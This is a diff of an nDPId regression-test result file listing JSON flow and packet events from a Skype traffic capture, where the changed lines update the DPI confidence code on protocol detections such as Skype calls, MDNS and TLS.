+00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1669,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.26.55.167","src_port":13021,"dst_port":63773,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1670,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.185.207.12","src_port":13021,"dst_port":45493,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1670,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":1431969713813,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969713813,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuxDQAAEAR2PrAqAEiTLnPDDLdsbUAGvt+nPYC2PYYRrvqRJzYx\/ENvQip"} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1670,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.185.207.12","src_port":13021,"dst_port":45493,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1670,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.185.207.12","src_port":13021,"dst_port":45493,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1671,"source":"skype.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.97.100.249","src_port":13021,"dst_port":26635,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1671,"source":"skype.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":1431969713813,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969713813,"pkt":"0NQSxnP1PBXCt3IOCABFAAAu9OEAAEARrrjAqAEisGFk+TLdaAsAGvRlnPgCVJNAf7hukPL\/wXB1U06s"} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1671,"source":"skype.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.97.100.249","src_port":13021,"dst_port":26635,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1671,"source":"skype.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.97.100.249","src_port":13021,"dst_port":26635,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1672,"source":"skype.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.62.0.85","src_port":13021,"dst_port":33647,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1672,"source":"skype.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":1431969713813,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969713813,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuQzIAAEARLjDAqAEiRz4AVTLdg28AGnA0nPoCdLBbJLLwvfiy++3Nr6hQ"} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1672,"source":"skype.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.62.0.85","src_port":13021,"dst_port":33647,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1672,"source":"skype.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713813,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.62.0.85","src_port":13021,"dst_port":33647,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1673,"source":"skype.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713814,"flow_last_seen":1431969713814,"flow_idle_time":200000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1431969713814,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1673,"source":"skype.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1431969713814,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1431969713814,"pkt":"PBXCt3IOxCwDBkn+CABFAADBLbUAAP8R6nbAqAFc4AAA+xTpFOkArSlHAAAAAAAEAAMAAAAAC19hZnBvdmVydGNwBF90Y3AFbG9jYWwAAAyAAQRfc21iwBgADIABBF9yZmLAGAAMgAEGX2FkaXNrwBgADIABwAwADAABAAAPvAAWE0x1Y2HigJlzIE1hY0Jvb2tQcm\/ADMAMAAwAAQAADA4AEA1MdWNh4oCZcyBpTWFjwAzAKAAMAAEAAAwOABANTHVjYeKAmXMgaU1hY8Ao"} -00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1673,"source":"skype.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713814,"flow_last_seen":1431969713814,"flow_idle_time":200000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1431969713814,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_afpovertcp._tcp.local"}} +00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1673,"source":"skype.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713814,"flow_last_seen":1431969713814,"flow_idle_time":200000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1431969713814,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_afpovertcp._tcp.local"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1674,"source":"skype.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713815,"flow_last_seen":1431969713815,"flow_idle_time":200000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1431969713815,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1674,"source":"skype.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1431969713815,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":227,"pkt_l4_len":173,"thread_ts_msec":1431969713815,"pkt":"MzMAAAD7xCwDBkn+ht1gAU9NAK0R\/\/6AAAAAAAAAxiwD\/\/4GSf7\/AgAAAAAAAAAAAAAAAAD7FOkU6QCtu5cAAAAAAAQAAwAAAAALX2FmcG92ZXJ0Y3AEX3RjcAVsb2NhbAAADIABBF9zbWLAGAAMgAEEX3JmYsAYAAyAAQZfYWRpc2vAGAAMgAHADAAMAAEAAA+8ABYTTHVjYeKAmXMgTWFjQm9va1Byb8AMwAwADAABAAAMDgAQDUx1Y2HigJlzIGlNYWPADMAoAAwAAQAADA4AEA1MdWNh4oCZcyBpTWFjwCg="} -00695{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1674,"source":"skype.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713815,"flow_last_seen":1431969713815,"flow_idle_time":200000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1431969713815,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_afpovertcp._tcp.local"}} +00695{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1674,"source":"skype.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713815,"flow_last_seen":1431969713815,"flow_idle_time":200000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1431969713815,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_afpovertcp._tcp.local"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1681,"source":"skype.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713965,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.145","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1681,"source":"skype.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":1431969713965,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969713965,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuO\/8AAEARXS3AqAEinTeCkTLdAbsAGqTTnQwCwP4SRbwMfSMDCWlEQOP1"} 
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1681,"source":"skype.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713965,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.145","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1681,"source":"skype.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713965,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.145","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1682,"source":"skype.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713965,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.39","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1682,"source":"skype.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":1431969713965,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969713965,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuUbAAAEARRubAqAEiQTffJzLdAbsAGjQZnQ4ChKdksriBAZEnlRRV2r4X"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1682,"source":"skype.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713965,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.39","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1682,"source":"skype.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969713965,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.39","src_port":13021,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1691,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969714165,"flow_last_seen":1431969714165,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969714165,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1691,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1431969714165,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714165,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXlBAAEAG5mHAqAEiW77YfcO\/AbtO2k10AAAAALAC\/\/\/+rQAAAgQFtAEDAwUBAQgKPiOiXAAAAAAEAgAA"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1695,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":2,"flow_last_seen":1431969714207,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969714207,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0n3BAAPUG8ERbvth9wKgBIgG7w79kPKOqTtpNdYASH\/7vYgAAAgQFoAEDAwQBAQQC"} 
@@ -910,7 +910,7 @@ 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2003,"source":"skype.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":3,"flow_last_seen":1431969717375,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969717375,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0inxAAEAGiT\/AqAEiUYUTucPMrY9zRWLTLqF3x4AQECwsDQAAAQEICj4jroYCsDZE"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2044,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717899,"flow_last_seen":1431969717899,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1431969717899,"l3_proto":"ip4","src_ip":"17.143.160.22","dst_ip":"192.168.1.34","src_port":5223,"dst_port":49447,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2044,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1431969717899,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1431969717899,"pkt":"PBXCt3IO0NQSxnP1CABFAAEJlCBAADAGQl8Rj6AWwKgBIhRnwSeBM8VdlvCqUoAYASHIigAAAQEIClVKAjo+IiGKFwMBANBGiA2FCgkg8zogS8Wv8uA0hKKXZpqXahZerQ98bBCn7C+LnTtdb1gFMe8akVD0ZXaKV2LbbgrevU7SQvBoNrIKmLDngOd7HnJnwMZSKAgZhBWjSGnNxPPChGecLDOMDXdtNcHO5aH0kerDi4eahd\/xxcweKHEqdaSg9EF7AN1znxgL9Vtu5lzdAyFIAlRZuEfAfgPOG5VblTu4iCKf5kwtqrTH0XrU9yr9hT+57cz\/TU37sy04NvAQJNXRsNfuIJU+SbJ1mgQuWHV+U5AtBgSt"} 
-00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2044,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717899,"flow_last_seen":1431969717899,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1431969717899,"l3_proto":"ip4","src_ip":"17.143.160.22","dst_ip":"192.168.1.34","src_port":5223,"dst_port":49447,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2044,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969717899,"flow_last_seen":1431969717899,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1431969717899,"l3_proto":"ip4","src_ip":"17.143.160.22","dst_ip":"192.168.1.34","src_port":5223,"dst_port":49447,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2045,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":2,"flow_last_seen":1431969717900,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969717900,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ie5AAEAGPWbAqAEiEY+gFsEnFGeW8KpSgTPGMoAQD\/lO7gAAAQEICj4jsIZVSgI6"} 00593{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2046,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":3,"flow_last_seen":1431969717901,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":156,"pkt_l4_len":122,"thread_ts_msec":1431969717901,"pkt":"0NQSxnP1PBXCt3IOCABFAACOywdAAEAG+\/LAqAEiEY+gFsEnFGeW8KpSgTPGMoAYEAClWwAAAQEICj4jsIdVSgI6FwMBACBFSXcAQNGwOhcu0QVlHuKzyvFkGgpCme0Kai94jEbJ0RcDAQAwQN+VK2ikiOW7uk5UyLlTNolrUZSBmQX1wD8NXzXPIFfAPuABh4UNMZuiOLR\/\/d5p"} 00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2047,"source":"skype.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":3,"flow_last_seen":1431969717905,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1431969717905,"pkt":"PBXCt3IOxCwDBkn+CABFAADBmPEAAP8RfzrAqAFc4AAA+xTpFOkArRpOAAAAAAAEAAMAAAAAC19hZnBvdmVydGNwBF90Y3AFbG9jYWwAAAwAAQRfcmZiwBgADAABBF9zbWLAGAAMAAEGX2FkaXNrwBgADAABwAwADAABAAAPuAAWE0x1Y2HigJlzIE1hY0Jvb2tQcm\/ADMAMAAwAAQAADAoAEA1MdWNh4oCZcyBpTWFjwAzAMwAMAAEAAAwKABANTHVjYeKAmXMgaU1hY8Az"} 
@@ -931,34 +931,34 @@ 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2113,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":2,"flow_last_seen":1431969718838,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969718838,"pkt":"0NQSxnP1PBXCt3IOCABFAAAupZYAAEAR95jAqAEiTLnPDDLdsbUAGqRNnm8CZa4cvOCl2walp\/2oMJDI"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2123,"source":"skype.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969719055,"flow_last_seen":1431969719055,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1431969719055,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62454,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 